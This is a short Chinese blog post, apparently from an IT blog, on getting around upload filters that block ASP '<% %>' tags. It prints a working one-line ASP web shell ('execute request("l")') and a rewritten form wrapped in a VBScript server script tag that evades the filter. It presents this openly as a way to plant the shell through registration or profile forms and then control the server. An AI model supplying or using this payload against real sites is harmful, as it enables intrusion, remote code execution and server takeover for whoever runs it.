突破〈%%〉標記過濾
很多時候我們可以通過在註冊表單或者用戶信息修改表單中,插入簡短的ASP代碼,使網站ASP數據庫變成爲一個ASP***,然後進一步***控制服務器。不過在上傳代碼過程中,許多網頁程序都不允許包含〈%%〉標記符號的內容的文件上傳。
這樣就有好多SHELL不能上傳上去了。可以採用下面的方法解決。以藍屏最小ASP***爲例。
原來的程序代碼是“〈%execute request("l")%>", 我們可以把它的標籤換下來,改成"<scriptlanguage=VBScript runat=server>execute request("l")</Script>".這樣就避開了使用〈%%〉,保存爲.ASP,程序照樣執行。效果是一樣的
一句話***中突破〈%%〉標記過濾
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章
Linux基本操作命令
wbzjacky
2019-02-24 13:12:38
真實的模擬***綜合實驗
wbzjacky
2019-02-24 13:12:37
三層交換機的HSRP、vlan、端口聚合
wbzjacky
2019-02-24 13:12:37
HSRP和二層交換機的端口聚合、vlan
wbzjacky
2019-02-24 13:12:37
服務器雙機熱備解決方案
wbzjacky
2019-02-24 13:12:37
各種光模塊的傳輸距離
realzfd
2019-02-24 13:10:25
ESX4 通過VMware vSphere CLI 開啓snmp
realzfd
2019-02-24 13:09:43
SOLARWINDS服務器更改計算機名導致的一次奇怪故障
realzfd
2019-02-24 13:09:42
Dlink交換機常用命令
千年小道
2019-02-24 13:06:21
Sametime的安裝細節問題
god9394
2019-02-24 13:04:19
電信禁止路由器上網的破解方法
god9394
2019-02-24 13:03:51